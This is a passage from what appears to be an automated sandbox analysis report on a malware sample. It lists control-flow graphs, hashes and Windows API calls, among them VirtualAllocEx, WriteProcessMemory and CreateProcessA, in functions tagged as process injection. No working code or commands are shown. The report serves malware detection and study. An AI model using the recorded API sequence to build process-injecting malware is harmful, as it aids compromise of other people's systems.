2d874d8-2d874f2 836->838 839 2d874a9-2d874d2 838->839 840 2d874f4-2d8750d 838->840 839->838 841 2d8750f 840->841 842 2d87514-2d8751c 840->842 841->842 842->796 865->866 874 2d878b9-2d882b7 call 2d86c6c call 2d86898 call 2d86c0c call 2d86c1c call 2d86c2c call 2d86898 call 2d86c0c call 2d86c1c call 2d86c2c call 2d86898 call 2d86c0c call 2d86c1c call 2d86c2c call 2d86898 call 2d86c0c call 2d86c1c call 2d86c2c call 2d86c3c call 2d86c4c call 2d86898 call 2d86c0c call 2d86c1c call 2d86c2c call 2d86c3c call 2d86c4c call 2d86c7c call 2d86c8c call 2d86c9c call 2d86cac * 6 call 2d86cbc 866->874 986 2d882b9-2d882c5 874->986 987 2d882e1 874->987 989 2d882cf-2d882d5 986->989 990 2d882c7-2d882cd 986->990 988 2d882e7-2d883d1 call 2d86ccc call 2d86cdc call 2d86cec call 2d86c0c call 2d86cfc call 2d86d0c call 2d86d1c 987->988 992 2d882df 989->992 990->992 992->988
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2132977723.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2d80000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID: Pp]q
                      • API String ID: 0-2528107101
                      • Opcode ID: 047f86716ffc8f8db8dde837711331a822de7b83308af9f26ae1d40aec21c7be
                      • Instruction ID: d44839db5188d9deb6e9b2ad60ae6babc72802b8cfcb7f8600681308bfafa355
                      • Opcode Fuzzy Hash: 047f86716ffc8f8db8dde837711331a822de7b83308af9f26ae1d40aec21c7be
                      • Instruction Fuzzy Hash: 87C2C334A01619CFDB64EF68C884AD9B7B6FF89301F1195E9D409AB365DB30AE85CF40
                      Function 02D87010 Relevance: 2.2, Strings: 1, Instructions: 971COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1009 2d87010-2d8704b 1011 2d8704d 1009->1011 1012 2d87052-2d870e8 1009->1012 1011->1012 1017 2d870f2-2d870fe call 2d86868 1012->1017 1019 2d87103-2d8714c call 2d86878 1017->1019 1025 2d87156-2d87162 call 2d86888 1019->1025 1027 2d87167-2d871ee 1025->1027 1033 2d8751f-2d87538 1027->1033 1034 2d8753e-2d87607 call 2d86888 call 2d86868 * 2 1033->1034 1035 2d871f3-2d871fa 1033->1035 1081 2d87612-2d8762c call 2d86898 1034->1081 1036 2d87221-2d87232 1035->1036 1037 2d871fc-2d8721e 1036->1037 1038 2d87234-2d87263 1036->1038 1037->1036 1040 2d8726a-2d87278 1038->1040 1041 2d87265 1038->1041 1044 2d872a5-2d872b6 1040->1044 1041->1040 1045 2d872b8-2d872d2 1044->1045 1046 2d8727a-2d872a2 1044->1046 1048 2d872f8-2d87309 1045->1048 1046->1044 1049 2d8730b-2d87324 1048->1049 1050 2d872d4-2d872f5 1048->1050 1052 2d8732b-2d87339 1049->1052 1053 2d87326 1049->1053 1050->1048 1055 2d8735b-2d8736c 1052->1055 1053->1052 1056 2d8733b-2d87358 1055->1056 1057 2d8736e-2d87387 1055->1057 1056->1055 1059 2d87389 1057->1059 1060 2d8738e-2d873a7 1057->1060 1059->1060 1061 2d873c7-2d873d8 1060->1061 1063 2d873a9-2d873c4 1061->1063 1064 2d873da-2d873f4 1061->1064 1063->1061 1065 2d87416-2d8742d 1064->1065 1068 2d8742f-2d87446 1065->1068 1069 2d873f6-2d87413 1065->1069 1071 2d87477-2d87491 1068->1071 1069->1065 1072 2d87448-2d87471 1071->1072 1073 2d87493-2d874a7 1071->1073 1072->1071 1075 2d874d8-2d874f2 1073->1075 1076 2d874a9-2d874d2 1075->1076 1077 2d874f4-2d8750d 1075->1077 1076->1075 1078 2d8750f 1077->1078 1079 2d87514-2d8751c 1077->1079 1078->1079 1079->1033 1083 2d87631-2d876e2 call 2d86c0c 1081->1083 1088 2d876ec-2d87706 call 2d86c1c 1083->1088 1090 2d8770b-2d8771c call 2d86c2c 1088->1090 1092 2d87721-2d87736 1090->1092 1093 2d8773b-2d8779c call 2d86c3c call 2d86c4c 1092->1093 1099 2d877a1-2d877c1 1093->1099 1101 2d877c7-2d877d7 1099->1101 1102 2d877d9 1101->1102 1103 2d877de-2d87885 call 2d86c5c 1101->1103 1102->1103 1110 2d87890-2d878ae 1103->1110 1111 2d878b9-2d882b7 call 2d86c6c call 2d86898 call 2d86c0c call 2d86c1c call 2d86c2c call 2d86898 call 2d86c0c call 2d86c1c call 2d86c2c call 2d86898 call 2d86c0c call 2d86c1c call 2d86c2c call 2d86898 call 2d86c0c call 2d86c1c call 2d86c2c call 2d86c3c call 2d86c4c call 2d86898 call 2d86c0c call 2d86c1c call 2d86c2c call 2d86c3c call 2d86c4c call 2d86c7c call 2d86c8c call 2d86c9c call 2d86cac * 6 call 2d86cbc 1110->1111 1223 2d882b9-2d882c5 1111->1223 1224 2d882e1 1111->1224 1226 2d882cf-2d882d5 1223->1226 1227 2d882c7-2d882cd 1223->1227 1225 2d882e7-2d883d1 call 2d86ccc call 2d86cdc call 2d86cec call 2d86c0c call 2d86cfc call 2d86d0c call 2d86d1c 1224->1225 1229 2d882df 1226->1229 1227->1229 1229->1225
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2132977723.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2d80000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID: Pp]q
                      • API String ID: 0-2528107101
                      • Opcode ID: 3018ae52ef1b862a90dd9836df9562bbecc2666fe7b8e73672b26a0833e1b59e
                      • Instruction ID: fe6089ed7883b8a71dc86a6b400267bc3df4a42379d6bd66548f66503fdae9bb
                      • Opcode Fuzzy Hash: 3018ae52ef1b862a90dd9836df9562bbecc2666fe7b8e73672b26a0833e1b59e
                      • Instruction Fuzzy Hash: 4BA2B234A506198FCB64EF68C884AD9B7B6FF89310F1186E9D5096B364DB31AEC5CF40
                      Function 01327375 Relevance: .0, Instructions: 24COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9d67bb2773af7f5113f6e0cf2d8e6afb282d6a3c08bfe6c042486c380830dd8e
                      • Instruction ID: c361ba83fc6f02661eef2e508e478eb6c54afa310913ba442b5ccb0b74730d88
                      • Opcode Fuzzy Hash: 9d67bb2773af7f5113f6e0cf2d8e6afb282d6a3c08bfe6c042486c380830dd8e
                      • Instruction Fuzzy Hash: 7AE0E279D49139DACB22AF58A4502F8B3BDBB6F629F0024A1D50EA3901C3308A958A55
                      Function 01327490 Relevance: .0, Instructions: 18COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fa7c243e25ae0e677cbf8774a2f12f313cfe710012b09501413043abc33b3d58
                      • Instruction ID: ed551d31e1edcbe1ee343e3cb2f5338ed3a26b7503e31534736fbdff1ff34b23
                      • Opcode Fuzzy Hash: fa7c243e25ae0e677cbf8774a2f12f313cfe710012b09501413043abc33b3d58
                      • Instruction Fuzzy Hash: A4C08C36D8F03CD6CA023AA438000F8F73CAAAB469F003092C10EA3C12C0108A290268
                      Function 0137D2F0 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 587 137d2f0-137d38f GetCurrentProcess 592 137d391-137d397 587->592 593 137d398-137d3cc GetCurrentThread 587->593 592->593 594 137d3d5-137d409 GetCurrentProcess 593->594 595 137d3ce-137d3d4 593->595 597 137d412-137d42d call 137d4da 594->597 598 137d40b-137d411 594->598 595->594 600 137d433-137d462 GetCurrentThreadId 597->600 598->597 602 137d464-137d46a 600->602 603 137d46b-137d4cd 600->603 602->603
                      APIs
                      • GetCurrentProcess.KERNEL32 ref: 0137D37E
                      • GetCurrentThread.KERNEL32 ref: 0137D3BB
                      • GetCurrentProcess.KERNEL32 ref: 0137D3F8
                      • GetCurrentThreadId.KERNEL32 ref: 0137D451
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131460876.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1370000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: Current$ProcessThread
                      • String ID:
                      • API String ID: 2063062207-0
                      • Opcode ID: 974697c5cff6409249e4e4aa4240b9b42aa8c8b8a8beb8ef45aaad75e5a1154b
                      • Instruction ID: 0730e7076a9ccdf8296a32cd2460e82b9a9af2336d6c3da16c219688bc1d608d
                      • Opcode Fuzzy Hash: 974697c5cff6409249e4e4aa4240b9b42aa8c8b8a8beb8ef45aaad75e5a1154b
                      • Instruction Fuzzy Hash: 3B5156B0900349CFDB19DFAAD648BAEBFF1EF49304F248459E009A73A1D7385948CB65
                      Function 0137D300 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 610 137d300-137d38f GetCurrentProcess 614 137d391-137d397 610->614 615 137d398-137d3cc GetCurrentThread 610->615 614->615 616 137d3d5-137d409 GetCurrentProcess 615->616 617 137d3ce-137d3d4 615->617 619 137d412-137d42d call 137d4da 616->619 620 137d40b-137d411 616->620 617->616 622 137d433-137d462 GetCurrentThreadId 619->622 620->619 624 137d464-137d46a 622->624 625 137d46b-137d4cd 622->625 624->625
                      APIs
                      • GetCurrentProcess.KERNEL32 ref: 0137D37E
                      • GetCurrentThread.KERNEL32 ref: 0137D3BB
                      • GetCurrentProcess.KERNEL32 ref: 0137D3F8
                      • GetCurrentThreadId.KERNEL32 ref: 0137D451
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131460876.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1370000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: Current$ProcessThread
                      • String ID:
                      • API String ID: 2063062207-0
                      • Opcode ID: b4bbf2b32039032bd1ecfce365d370fc3e905eac0d46670cca82e96712195d87
                      • Instruction ID: d0fa3b4b31f5ba2048d3b4f6ae7cf54561c611648cbc0e8cb252cb80324fd139
                      • Opcode Fuzzy Hash: b4bbf2b32039032bd1ecfce365d370fc3e905eac0d46670cca82e96712195d87
                      • Instruction Fuzzy Hash: 505138B0900349CFDB18DFAAD648BAEBBF1FF48304F208459E409A7360D7385948CB65
                      Function 013239D4 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1246 13239d4-13239d6 1247 13239d8 1246->1247 1248 13239dd-1323a75 1246->1248 1247->1248 1250 1323a77-1323a81 1248->1250 1251 1323aae-1323ace 1248->1251 1250->1251 1252 1323a83-1323a85 1250->1252 1256 1323ad0-1323ada 1251->1256 1257 1323b07-1323b36 1251->1257 1254 1323a87-1323a91 1252->1254 1255 1323aa8-1323aab 1252->1255 1258 1323a93 1254->1258 1259 1323a95-1323aa4 1254->1259 1255->1251 1256->1257 1260 1323adc-1323ade 1256->1260 1267 1323b38-1323b42 1257->1267 1268 1323b6f-1323c29 CreateProcessA 1257->1268 1258->1259 1259->1259 1261 1323aa6 1259->1261 1262 1323ae0-1323aea 1260->1262 1263 1323b01-1323b04 1260->1263 1261->1255 1265 1323aee-1323afd 1262->1265 1266 1323aec 1262->1266 1263->1257 1265->1265 1269 1323aff 1265->1269 1266->1265 1267->1268 1270 1323b44-1323b46 1267->1270 1279 1323c32-1323cb8 1268->1279 1280 1323c2b-1323c31 1268->1280 1269->1263 1271 1323b48-1323b52 1270->1271 1272 1323b69-1323b6c 1270->1272 1274 1323b56-1323b65 1271->1274 1275 1323b54 1271->1275 1272->1268 1274->1274 1276 1323b67 1274->1276 1275->1274 1276->1272 1290 1323cba-1323cbe 1279->1290 1291 1323cc8-1323ccc 1279->1291 1280->1279 1290->1291 1292 1323cc0 1290->1292 1293 1323cce-1323cd2 1291->1293 1294 1323cdc-1323ce0 1291->1294 1292->1291 1293->1294 1295 1323cd4 1293->1295 1296 1323ce2-1323ce6 1294->1296 1297 1323cf0-1323cf4 1294->1297 1295->1294 1296->1297 1298 1323ce8 1296->1298 1299 1323d06-1323d0d 1297->1299 1300 1323cf6-1323cfc 1297->1300 1298->1297 1301 1323d24 1299->1301 1302 1323d0f-1323d1e 1299->1302 1300->1299 1304 1323d25 1301->1304 1302->1301 1304->1304
                      APIs
                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01323C16
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 0bab78ff0d107b09e525c03b9d6ad9bdaf27beb577c68944d7240c339a3cf26d
                      • Instruction ID: 3fec0271f9cb3fb892fec584270b0624acf4326e979f8ead0c04f5b46113afc0
                      • Opcode Fuzzy Hash: 0bab78ff0d107b09e525c03b9d6ad9bdaf27beb577c68944d7240c339a3cf26d
                      • Instruction Fuzzy Hash: E1914C71D00629CFEF24DF69C841BEDBBB2BF48314F14856AD808A7280DB789985CF91
                      Function 013239E0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1305 13239e0-1323a75 1307 1323a77-1323a81 1305->1307 1308 1323aae-1323ace 1305->1308 1307->1308 1309 1323a83-1323a85 1307->1309 1313 1323ad0-1323ada 1308->1313 1314 1323b07-1323b36 1308->1314 1311 1323a87-1323a91 1309->1311 1312 1323aa8-1323aab 1309->1312 1315 1323a93 1311->1315 1316 1323a95-1323aa4 1311->1316 1312->1308 1313->1314 1317 1323adc-1323ade 1313->1317 1324 1323b38-1323b42 1314->1324 1325 1323b6f-1323c29 CreateProcessA 1314->1325 1315->1316 1316->1316 1318 1323aa6 1316->1318 1319 1323ae0-1323aea 1317->1319 1320 1323b01-1323b04 1317->1320 1318->1312 1322 1323aee-1323afd 1319->1322 1323 1323aec 1319->1323 1320->1314 1322->1322 1326 1323aff 1322->1326 1323->1322 1324->1325 1327 1323b44-1323b46 1324->1327 1336 1323c32-1323cb8 1325->1336 1337 1323c2b-1323c31 1325->1337 1326->1320 1328 1323b48-1323b52 1327->1328 1329 1323b69-1323b6c 1327->1329 1331 1323b56-1323b65 1328->1331 1332 1323b54 1328->1332 1329->1325 1331->1331 1333 1323b67 1331->1333 1332->1331 1333->1329 1347 1323cba-1323cbe 1336->1347 1348 1323cc8-1323ccc 1336->1348 1337->1336 1347->1348 1349 1323cc0 1347->1349 1350 1323cce-1323cd2 1348->1350 1351 1323cdc-1323ce0 1348->1351 1349->1348 1350->1351 1352 1323cd4 1350->1352 1353 1323ce2-1323ce6 1351->1353 1354 1323cf0-1323cf4 1351->1354 1352->1351 1353->1354 1355 1323ce8 1353->1355 1356 1323d06-1323d0d 1354->1356 1357 1323cf6-1323cfc 1354->1357 1355->1354 1358 1323d24 1356->1358 1359 1323d0f-1323d1e 1356->1359 1357->1356 1361 1323d25 1358->1361 1359->1358 1361->1361
                      APIs
                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01323C16
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: eb0d198c568d92faa39e3112cf0b20f7f6805061209acf51aed8bcc57227469c
                      • Instruction ID: 0d6243bb42a7068207d46d3b8b97d8e74c1fba6d082e68ecbb13b35ad9f2f0de
                      • Opcode Fuzzy Hash: eb0d198c568d92faa39e3112cf0b20f7f6805061209acf51aed8bcc57227469c
                      • Instruction Fuzzy Hash: 34914D71D00629DFEF24DF69C841BEDBBB2BF48714F14856AD808A7280DB789985CF91
                      Function 0137B070 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1362 137b070-137b07f 1363 137b081-137b08e call 137aa24 1362->1363 1364 137b0ab-137b0af 1362->1364 1371 137b0a4 1363->1371 1372 137b090 1363->1372 1366 137b0c3-137b104 1364->1366 1367 137b0b1-137b0bb 1364->1367 1373 137b106-137b10e 1366->1373 1374 137b111-137b11f 1366->1374 1367->1366 1371->1364 1418 137b096 call 137b2f9 1372->1418 1419 137b096 call 137b308 1372->1419 1373->1374 1375 137b143-137b145 1374->1375 1376 137b121-137b126 1374->1376 1381 137b148-137b14f 1375->1381 1378 137b131 1376->1378 1379 137b128-137b12f call 137aa30 1376->1379 1377 137b09c-137b09e 1377->1371 1380 137b1e0-137b2a0 1377->1380 1383 137b133-137b141 1378->1383 1379->1383 1413 137b2a2-137b2a5 1380->1413 1414 137b2a8-137b2d3 GetModuleHandleW 1380->1414 1384 137b151-137b159 1381->1384 1385 137b15c-137b163 1381->1385 1383->1381 1384->1385 1386 137b165-137b16d 1385->1386 1387 137b170-137b179 call 137aa40 1385->1387 1386->1387 1393 137b186-137b18b 1387->1393 1394 137b17b-137b183 1387->1394 1395 137b18d-137b194 1393->1395 1396 137b1a9-137b1b6 1393->1396 1394->1393 1395->1396 1398 137b196-137b1a6 call 137aa50 call 137aa60 1395->1398 1402 137b1d9-137b1df 1396->1402 1403 137b1b8-137b1d6 1396->1403 1398->1396 1403->1402 1413->1414 1415 137b2d5-137b2db 1414->1415 1416 137b2dc-137b2f0 1414->1416 1415->1416 1418->1377 1419->1377
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0137B2C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131460876.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1370000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: 8f3d19919361880f805c19dc9e655f5bbcde16d10f5d3f7ec6f47d77d053322c
                      • Instruction ID: a9ce593a51d757512797c9923da576049059b85834a8018f62363049030f00a8
                      • Opcode Fuzzy Hash: 8f3d19919361880f805c19dc9e655f5bbcde16d10f5d3f7ec6f47d77d053322c
                      • Instruction Fuzzy Hash: 7C713470A00B058FE724DF2AD54475ABBF5FF88304F00892DD48ADBA54DB79E945CB90
                      Function 02D81CE5 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1420 2d81ce5-2d81d56 1422 2d81d58-2d81d5e 1420->1422 1423 2d81d61-2d81d68 1420->1423 1422->1423 1424 2d81d6a-2d81d70 1423->1424 1425 2d81d73-2d81dab 1423->1425 1424->1425 1426 2d81db3-2d81e12 CreateWindowExW 1425->1426 1427 2d81e1b-2d81e53 1426->1427 1428 2d81e14-2d81e1a 1426->1428 1432 2d81e60 1427->1432 1433 2d81e55-2d81e58 1427->1433 1428->1427 1434 2d81e61 1432->1434 1433->1432 1434->1434
                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02D81E02
                      Memory Dump Source
                      • Source File: 00000000.00000002.2132977723.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2d80000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: CreateWindow
                      • String ID:
                      • API String ID: 716092398-0
                      • Opcode ID: 743e7c52673f580b806bf10d15178a9c23e0fc2bfa209e6ee0c55148fbcb943b
                      • Instruction ID: 0c62ee665e09b48123964c1efd5f968fa7d4b17b0c708f4c32a76688cdc712c0
                      • Opcode Fuzzy Hash: 743e7c52673f580b806bf10d15178a9c23e0fc2bfa209e6ee0c55148fbcb943b
                      • Instruction Fuzzy Hash: 4351E0B1D00309DFDB14DF9AC984ADEFBB5BF48300F64812AE418AB210D775A885CF90
                      Function 02D81CF0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                      Download Yara Rule
                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02D81E02
                      Memory Dump Source
                      • Source File: 00000000.00000002.2132977723.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2d80000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: CreateWindow
                      • String ID:
                      • API String ID: 716092398-0
                      • Opcode ID: df4da44883e9f4b2a7b9d841d26d7c1e8f54222c3cb73eda180402bf14a4d71b
                      • Instruction ID: 745d923a26aff7fcbeff143f536256c64f633995ebc81d5c6a3fe7d602e968a6
                      • Opcode Fuzzy Hash: df4da44883e9f4b2a7b9d841d26d7c1e8f54222c3cb73eda180402bf14a4d71b
                      • Instruction Fuzzy Hash: DB41B0B1D00319DFDB14DF9AC984ADEBBB5BF48314F24852AE819AB210D775A885CF90
                      Function 0137590D Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                      Download Yara Rule
                      APIs
                      • CreateActCtxA.KERNEL32(?), ref: 013759C9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131460876.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1370000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: Create
                      • String ID:
                      • API String ID: 2289755597-0
                      • Opcode ID: 7ecb996a780e79dc960c58978f2382b475706dd2fa9b9dbface5a655e3f3e26d
                      • Instruction ID: 3b8fb38a9cf324b8989b3b4ddc19552f39e2261099024dfd8a41d7fb68661507
                      • Opcode Fuzzy Hash: 7ecb996a780e79dc960c58978f2382b475706dd2fa9b9dbface5a655e3f3e26d
                      • Instruction Fuzzy Hash: 3041F2B1C00719CBDB29DFAAC9847CDBBF1BF49304F20846AD409AB260DB756946CF50
                      Function 02D80BE4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                      Download Yara Rule
                      APIs
                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 02D84381
                      Memory Dump Source
                      • Source File: 00000000.00000002.2132977723.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2d80000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: CallProcWindow
                      • String ID:
                      • API String ID: 2714655100-0
                      • Opcode ID: 026decd6a36da2bdd1114bf74d07f53955fe4eac66cd030b3df4d2385d714997
                      • Instruction ID: c8efeb073c72bb9e08185e5d5dfe2883449959683a89d1691a51481a485ff8c4
                      • Opcode Fuzzy Hash: 026decd6a36da2bdd1114bf74d07f53955fe4eac66cd030b3df4d2385d714997
                      • Instruction Fuzzy Hash: 9D411AB49003059FCB14DF9AC448AAAFBF5FF89314F24C459E559AB361D374A841CFA0
                      Function 013744B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                      Download Yara Rule
                      APIs
                      • CreateActCtxA.KERNEL32(?), ref: 013759C9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131460876.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1370000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: Create
                      • String ID:
                      • API String ID: 2289755597-0
                      • Opcode ID: 42958f6a7ce4ba58052226ad89203c57ae4e2a533b1649b47ea79a10ddb20231
                      • Instruction ID: 7e9905269b3af5e37036ddf39ac8d67bb39cff8ae0e40573e6e8e1481923d0a5
                      • Opcode Fuzzy Hash: 42958f6a7ce4ba58052226ad89203c57ae4e2a533b1649b47ea79a10ddb20231
                      • Instruction Fuzzy Hash: 3841C5B0C0071DCBDB29DFAAC844B9DBBF5BF49304F20806AD409AB255D7755946CF91
                      Function 01323691 Relevance: 1.6, APIs: 1, Instructions: 78memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 01323706
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 817780d3c944cfc199c0222b3ac62bd0fc05ae9a54b491a66e8aed6884cf34a9
                      • Instruction ID: 69100ad41b3c286d50b99b6fffb2f9b148116b15484bf3fcd846ce6a78f22d42
                      • Opcode Fuzzy Hash: 817780d3c944cfc199c0222b3ac62bd0fc05ae9a54b491a66e8aed6884cf34a9
                      • Instruction Fuzzy Hash: 19215C768002199FDB20EFAAC8457EEFFF5FF88324F14841AD519A7250CB399541CBA0
                      Function 01323750 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                      Download Yara Rule
                      APIs
                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 013237E8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: f0f359f7f067f1c447f951df6650b19ed594938a1fb9bddcf2276d82dd1c849b
                      • Instruction ID: 67a6e55aee90b53494effde1e9404dc8a17641b303cc3335edb03c04d781645e
                      • Opcode Fuzzy Hash: f0f359f7f067f1c447f951df6650b19ed594938a1fb9bddcf2276d82dd1c849b
                      • Instruction Fuzzy Hash: F42126B59002199FCF14DFAEC885BEEBBF5FF48314F10842AE918A7240C7789544CBA0
                      Function 01323758 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                      Download Yara Rule
                      APIs
                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 013237E8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1320000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: d621b4167bd28c657689dbc768a7a682a0fa238a01629a87119d2a493ea4a857
                      • Instruction ID: d4b9fcba8cb5da96dbd00caa46ff4116c38a3070e33d18b0910617b3eabffc9e
                      • Opcode Fuzzy Hash: d621b4167bd28c657689dbc768a7a682a0fa238a01629a87119d2a493ea4a857
                      • Instruction Fuzzy Hash: 1B21F6B59003599FDB10DFAAC985BEEBBF5FF48314F10842AE919A7240D7789944CBA0
                      Function 0137D540 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                      Download Yara Rule
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0137D5CF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131460876.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1370000_RgIbrhxoEx.jbxd
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: c1c675ce8a6560b5be17ac3f439a5e79c479d82ad07ed06240b2c3297de2d288
                      • Instruction ID: 53166c7fac519bcbf293fabdbe50594a789e3dc1bae12a988ccce8b103946f4f
                      • Opcode Fuzzy Hash: c1c675ce8a6560b5be17ac3f439a5e79c479d82ad07ed06240b2c3297de2d288
                      • Instruction Fuzzy Hash: A421D4B59002099FDB10DFAAD984ADEBBF5FB48324F14841AE918A7250D379A944CFA4
                      Function 01323841 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                      Download Yara Rule
                      APIs
                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 013238C8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2131400882.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
